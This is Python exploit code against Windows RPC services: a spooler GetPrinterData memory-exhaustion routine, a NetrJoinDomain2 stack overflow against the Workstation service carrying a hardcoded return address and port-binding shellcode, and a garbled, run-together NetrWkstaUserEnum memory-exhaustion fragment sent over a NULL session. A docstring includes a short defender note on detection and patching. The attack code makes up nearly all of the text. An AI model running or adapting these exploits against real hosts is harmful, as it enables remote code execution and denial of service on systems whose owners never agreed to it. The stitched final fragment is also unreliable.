    # OpenPrinterEx: the three string arguments are length-prefixed UTF-16LE.
    query = OpenPrinterEx()
    printer = "\\\\%s\x00" % (host)
    query['printer'] = B1()
    query['printer']['id'] = 0x41414141
    query['printer']['max'] = len(printer)
    query['printer']['actual'] = len(printer)
    query['printer']['str'] = printer.encode('utf_16_le')
    client = "\\\\h07\x00"
    query['client'] = B2()
    query['client']['max'] = len(client)
    query['client']['actual'] = len(client)
    query['client']['str'] = client.encode('utf_16_le')
    user = "******"
    query['user'] = B2()
    query['user']['max'] = len(user)
    query['user']['actual'] = len(user)
    query['user']['str'] = user.encode('utf_16_le')
    dce.call(query.opnum, query)
    raw = dce.recv()
    # The first 20 bytes of the reply are taken as the printer handle; an
    # all-zero handle means the open failed and the trailing bytes hold the code.
    handle = raw[:20]
    if (handle == ("\x00" * 20)):
        self.gom.echo("[-] ERR: OpenPrinterEx()")
        if (raw[20:] == "\x09\x07\x00\x00"):
            self.gom.echo(
                "[-] Return code: Invalid printer name (0x00000709)")
        if (raw[20:] == "\x05\x00\x00\x00"):
            self.gom.echo("[-] Return code: Access denied (0x00000005)")
        return False
    # GetPrinterData with the oversized 'offered' buffer length.
    query = GetPrinterData()
    value = "blah_blah\x00"
    query['handle'] = handle
    query['value'] = B2()
    query['value']['max'] = len(value)
    query['value']['actual'] = len(value)
    query['value']['str'] = value.encode('utf_16_le')
    query['offered'] = memory_size
    dce.call(query.opnum, query)
    try:
        raw = dce.recv()
        status = raw[:4]
        r_size = raw[4:8]
        if (status == "\x1b\x00\x00\x1c"):
            self.gom.echo("[-] Memory allocation error, out of memory")
            return True
        if (r_size == pack("<L", memory_size)):
            self.gom.echo("[+] Memory allocated!")
    except NetBIOSTimeout, err:
        # No reply within the NetBIOS timeout is interpreted as exhaustion.
        self.gom.echo("[+] %s" % (err))
        self.gom.echo("[+] %s: Out of memory" % (host))
def DCEconnectAndExploit(target, domain):
    """Connect to the wkssvc named pipe on *target* and send a hand-built NetrJoinDomain2 (opnum 0x16) request.

    Args:
        target: host name or IP address for the ncacn_np string binding
            (the 'port' key in the binding dict is not referenced by the
            template and is ignored).
        domain: string spread into the second request fragment; its length
            is added to baselen (3708) for that fragment's length fields.
    The request is three raw byte strings (query1/query2/query3) whose
    layout the author only sketches in comments: hostname, domain/hostname,
    then filler, a return address the author attributes to user32.dll and a
    blob the author calls "port binding shellcode".  Nothing further is
    derivable from this listing.  Names resolved outside it: transport,
    uuid, struct.  The function prints progress, returns None and does not
    read a reply.

    Defender note: the wire signature is an SMB session to \\pipe\\wkssvc, a
    bind to 6bffd098-a112-3610-9833-46c3f87e345a v1.0 (WKSSVC) and an
    oversized opnum 0x16 request (several kilobytes of 0x90 filler);
    keeping the Workstation service patched and restricting SMB named-pipe
    access from untrusted networks are the controls.
    """
    baselen = 3708
    stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
    stringbinding %= {
        'host': target,
        'pipe': 'wkssvc',
        'port': 445,
    }
    print 'Connecting to named pipe (wkssvc)'
    trans = transport.DCERPCTransportFactory(stringbinding)
    trans.connect()
    print 'Setting up DCE transport'
    dce = trans.DCERPC_class(trans)
    dce.bind(
        uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a', '1.0')))
    print 'Sending attack payload to target'
    # NetrJoinDomain2 data: Hostname
    query1 = "\xaa\xbb\xcc\xdd"
    query1 += "\x07\x00\x00\x00"
    query1 += "\x00\x00\x00\x00"
    query1 += "\x07\x00\x00\x00"
    query1 += "\x5C\x00\x5C\x00"
    query1 += "\x41\x00\x55\x00"
    query1 += "\x58\x00\x37\x00"
    query1 += "\x00\x00\x00\x00"
    # NetrJoinDomain2 data: Domain/Hostname (domain interleaved with NULs)
    targetd = '\x00'.join(list(domain)) + '\x00'
    Len = baselen + len(domain)
    query2 = struct.pack('L', Len)
    query2 += struct.pack('L', 0)
    query2 += struct.pack('L', Len)
    query2 += targetd
    query3 = "\x5C\x00\x5C\x00\x76\x00\x90\x90"
    query3 += "\x90\x90" * 1058
    query3 += "\xEB\x06"  # 6 byte jump from current pointer in ebx
    query3 += "\x27\x16\xE1\x77"  # Address from user32.dll (0x77E11627)
    # 350 byte port binding shellcode (author's description)
    query3 += "\x90\x90\x90\x90\x90\x90"
    query3 += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
    query3 += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
    query3 += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
    query3 += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
    query3 += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
    query3 += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
    query3 += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
    query3 += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
    query3 += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
    query3 += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
    query3 += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
    query3 += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
    query3 += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
    query3 += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
    query3 += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
    query3 += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
    query3 += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
    query3 += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
    query3 += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
    query3 += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
    query3 += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
    query3 += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
    query3 += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
    query3 += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
    query3 += "\xba\xa6\xf5\x31\x39\x59\x23\xce"
    query3 += "\x90\x90" * 2467
    # Trailer words.
    query3 += "\x00\x00"
    query3 += "\x00\x00\x00\x00"
    query3 += "\x00\x00\x00\x00"
    query3 += "\x00\x00\x00\x00"
    query3 += "\x00\x00"
    query3 += "\x01\x00\x00\x00"
    query = query1 + query2 + query3
    dce.call(0x16, query)
('null_pointer', '<L=0'), ('max_len', '<L'), ('referent_id2', '<L=0x43434343'), ('enumeration_handle', '<L=0x00000000'), ) query = NetrWkstaUserEnum() server = "%s\x00" % (host) query['server'] = B1() query['server']['id'] = 0x41414141 query['server']['actual'] = len(server) query['server']['max'] = len(server) query['server']['str'] = utf16(server) query['max_len'] = memory_size trans = transport.DCERPCTransportFactory(stringbinding) print "[*] Connecting to %s:445 (NULL Session)" % (host) try: trans.connect() except Exception, err: print "[-] %s" % (err) exit() print "[+] Connected" dce = trans.DCERPC_class(trans) dce.bind(uuid.uuidtup_to_bin((UUID[0], UUID[1]))) dce.call(query.opnum, query)